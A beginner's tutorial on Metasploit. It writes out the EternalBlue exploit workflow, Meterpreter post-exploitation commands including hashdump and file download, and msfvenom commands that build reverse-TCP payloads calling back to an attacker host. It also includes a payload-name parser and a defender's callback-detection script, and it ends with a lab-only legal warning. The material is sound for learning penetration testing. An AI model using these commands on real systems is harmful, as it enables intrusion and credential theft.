Metasploit for Beginners: How the Framework Actually Works

Metasploit is the most widely used penetration testing framework. Understanding how it works — not just what commands to type — makes the difference between running modules blindly and understanding what’s actually happening on the target system.

What Metasploit Is

Metasploit is a framework for developing, testing, and executing exploits against target systems. It provides:

  • A database of exploit modules for known vulnerabilities
  • Payload generation and delivery infrastructure
  • Post-exploitation modules for privilege escalation, lateral movement, and data collection
  • A consistent interface across all of these capabilities

The key thing to understand: Metasploit doesn’t find vulnerabilities for you. It provides a framework for exploiting vulnerabilities you’ve already identified. The reconnaissance work — finding what services are running, what versions, what CVEs apply — happens before Metasploit comes into the workflow.

Core Concepts

Exploit module: The code that triggers the vulnerability on the target system.

Payload: The code that executes on the target after the exploit succeeds. The most common is Meterpreter — an in-memory payload that provides an interactive session with a rich set of post-exploitation commands.

RHOST / LHOST: Remote host (the target) and local host (your machine). These are the two most critical options in any module. Getting these wrong produces a failure; getting LHOST wrong while exploiting a real system can expose your machine.

Sessions: When an exploit succeeds and a payload connects back, it creates a session. The sessions command lists them; sessions -i N interacts with session N.

Basic Workflow

# Start the console
msfconsole

# Search for modules related to a specific vulnerability or service
search eternalblue
search type:exploit platform:windows smb

# Load a module
use exploit/windows/smb/ms17_010_eternalblue

# Show required options
show options

# Set target and payload
set RHOSTS 192.168.1.X
set LHOST 192.168.1.Y
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Verify and run
check # tests if target is vulnerable (not available on all modules)
run

Meterpreter Post-Exploitation

Once you have a Meterpreter session, common commands:

# System info
sysinfo
getuid          # current user context
getpid          # current process ID

# Privilege escalation
getsystem # attempt automatic privilege escalation
hashdump # dump password hashes (requires SYSTEM)

# File system
ls
download /path/to/file /local/path
upload /local/file /remote/path

# Network
ipconfig
arp # ARP cache - reveals other hosts on the network
portfwd add -l 4444 -p 3389 -r 192.168.X.X # port forward

# Further enumeration and session management
run post/multi/recon/local_exploit_suggester # suggest local privilege escalation paths
background # background the session, return to console

Payload Types

The naming convention tells you what the payload does:

windows/x64/meterpreter/reverse_tcp — Windows x64, Meterpreter, connects back to you over TCP.

Staged vs stageless: windows/meterpreter/reverse_tcp is staged — a small stager runs first, then downloads the full payload. windows/meterpreter_reverse_tcp (underscore) is stageless — the full payload is delivered at once. Stageless is larger but more reliable when you don’t control the network conditions between stages.

Shell vs Meterpreter: A shell payload gives you a command prompt. Meterpreter gives you a richer interactive session that runs in memory and is harder to detect. Prefer Meterpreter when available.
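The naming convention above is regular enough to parse mechanically, which is useful when reading payload names in module listings, msfvenom commands or incident notes. The following is an added example, not code from Metasploit itself: it splits a name into platform, optional architecture, payload type and transport, and uses the slash-versus-underscore rule to decide staged or stageless. It assumes the `platform[/arch]/type/transport` shapes shown on this page; the architecture token list is an assumption (common values, not exhaustive), and other families such as `cmd/unix/...` command payloads are not modeled.

```python
"""Parse Metasploit payload names into their components.

Added example (not part of msfconsole or msfvenom). Rules, as described above:
  platform[/arch]/<type>/<transport>   -> staged   (stager first, stage follows)
  platform[/arch]/<type>_<transport>   -> stageless (single self-contained payload)
"""
from dataclasses import dataclass
from typing import Optional

# Architecture tokens that may follow the platform (assumption: common values only).
ARCHES = {"x64", "x86", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}

# Direction prefixes seen in transport names; 'reverse' is what the page uses.
DIRECTIONS = {
    "reverse": "target connects back to LHOST:LPORT",
    "bind": "target listens and the operator connects in",
}


@dataclass
class PayloadName:
    platform: str          # e.g. "windows", "linux", "php"
    arch: Optional[str]    # e.g. "x64", or None when the name omits it
    kind: str              # e.g. "meterpreter", "shell"
    transport: str         # e.g. "reverse_tcp"
    staged: bool

    def describe(self) -> str:
        direction, _, proto = self.transport.partition("_")
        how = DIRECTIONS.get(direction, f"transport '{self.transport}'")
        if proto:
            how += f" over {proto}"
        staging = ("staged: a small stager runs first and fetches the rest"
                   if self.staged else "stageless: the whole payload is delivered at once")
        arch = self.arch or "arch unspecified"
        return f"{self.platform} ({arch}), {self.kind}, {how}; {staging}"


def parse_payload_name(name: str) -> PayloadName:
    """Split a payload name; raises ValueError for shapes this parser does not model."""
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]

    arch = None
    if rest[0] in ARCHES:          # optional architecture component
        arch = rest.pop(0)

    if len(rest) == 1:             # "meterpreter_reverse_tcp": stageless
        kind, sep, transport = rest[0].partition("_")
        if not sep:
            raise ValueError(f"cannot split type/transport in {name!r}")
        return PayloadName(platform, arch, kind, transport, staged=False)
    if len(rest) == 2:             # "meterpreter/reverse_tcp": staged
        kind, transport = rest
        return PayloadName(platform, arch, kind, transport, staged=True)
    raise ValueError(f"unexpected payload name shape: {name!r}")


if __name__ == "__main__":
    for n in ("windows/x64/meterpreter/reverse_tcp",
              "windows/meterpreter_reverse_tcp",
              "php/meterpreter_reverse_tcp",
              "linux/x64/shell/bind_tcp"):
        print(f"{n:40} -> {parse_payload_name(n).describe()}")
```

Running it on the four names in the main block shows the same transport (`reverse_tcp`) appearing as staged in one name and stageless in the next, which is exactly the distinction the paragraph above draws.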

Generating Standalone Payloads with msfvenom

# Generate a Windows executable payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.Y LPORT=4444 -f exe -o payload.exe

# Generate for other formats
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.Y LPORT=4444 -f elf -o payload
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.Y LPORT=4444 -f raw > shell.php

Set up a listener to catch the callback:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.Y
set LPORT 4444
run
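Seen from the target's network, the callback the handler above is waiting for is an ordinary outbound TCP connection from the compromised host to LHOST:LPORT, which is the defender's detection opportunity. The following is an added example of that detection logic, not part of Metasploit: it reads constructed flow-log lines in an assumed `key=value` format, skips flows that match a constructed baseline of expected destination networks and ports, and scores the remainder, weighting the port the page's examples use for LPORT (4444) more heavily while still flagging any other unexpected port, since an operator can choose any LPORT.

```python
"""Flag outbound flows that look like a payload callback to a handler.

Added example for the defender's side of the listener set-up above; it is not
part of Metasploit. The log lines and the baseline are constructed, and the
field names (src, dst, dport, proto, action) are an assumed flow-log format.
"""
import ipaddress
from typing import Dict, List

# Constructed baseline: destination network -> ports workstations are expected to reach.
BASELINE = {
    ipaddress.ip_network("10.0.5.0/24"): {53, 445, 3389},   # internal DNS, SMB, RDP
    ipaddress.ip_network("0.0.0.0/0"): {80, 443},           # web ports to anywhere
}

# LPORT used in the msfvenom/handler examples above; a hit raises the score
# but is not required, because any port can serve as LPORT.
EXAMPLE_HANDLER_PORT = 4444

# Constructed flow log (documentation address ranges used for external hosts).
FLOW_LOG = """\
2024-05-01T10:02:11Z src=10.0.5.23 dst=10.0.5.9 dport=445 proto=tcp action=allow
2024-05-01T10:02:12Z src=10.0.5.23 dst=192.0.2.10 dport=443 proto=tcp action=allow
2024-05-01T10:02:13Z src=10.0.5.23 dst=203.0.113.7 dport=4444 proto=tcp action=allow
2024-05-01T10:02:15Z src=10.0.5.41 dst=10.0.5.9 dport=3389 proto=tcp action=allow
2024-05-01T10:02:19Z src=10.0.5.41 dst=198.51.100.12 dport=8443 proto=tcp action=allow
"""


def parse_flow(line: str) -> Dict[str, str]:
    """Turn 'ts k=v k=v ...' into a dict; the timestamp is stored under 'ts'."""
    ts, *kvs = line.split()
    rec = dict(kv.split("=", 1) for kv in kvs)
    rec["ts"] = ts
    return rec


def expected(dst: str, dport: int) -> bool:
    """True when some baseline network contains dst and lists dport."""
    addr = ipaddress.ip_address(dst)
    return any(addr in net and dport in ports for net, ports in BASELINE.items())


def find_suspect_callbacks(log: str) -> List[Dict[str, object]]:
    """Return allowed TCP flows that fall outside the baseline, with a simple score."""
    hits: List[Dict[str, object]] = []
    for line in log.splitlines():
        rec = parse_flow(line)
        if rec.get("proto") != "tcp" or rec.get("action") != "allow":
            continue
        dport = int(rec["dport"])
        if expected(rec["dst"], dport):
            continue
        score = 2 if dport == EXAMPLE_HANDLER_PORT else 1
        hits.append({"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
                     "dport": dport, "score": score})
    return hits


if __name__ == "__main__":
    for h in find_suspect_callbacks(FLOW_LOG):
        print(f"{h['ts']} {h['src']} -> {h['dst']}:{h['dport']} score={h['score']}")
```

The baseline is what makes this useful: a port-only rule catches the example LPORT and nothing else, whereas "new destination and port for this host class" also surfaces the 8443 flow, which is how a callback on a non-default port shows up. In practice the baseline would be learned from historical flow data rather than typed in.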

Lab Environment

Before using Metasploit against anything, set up a lab. Metasploitable2 and Metasploitable3 are intentionally vulnerable VMs designed for this. Vulnhub and HackTheBox provide additional targets.

Running Metasploit against systems you don’t own and don’t have written authorization to test is a federal crime in the US under the CFAA. The lab environment isn’t optional — it’s how you build skills without committing crimes.
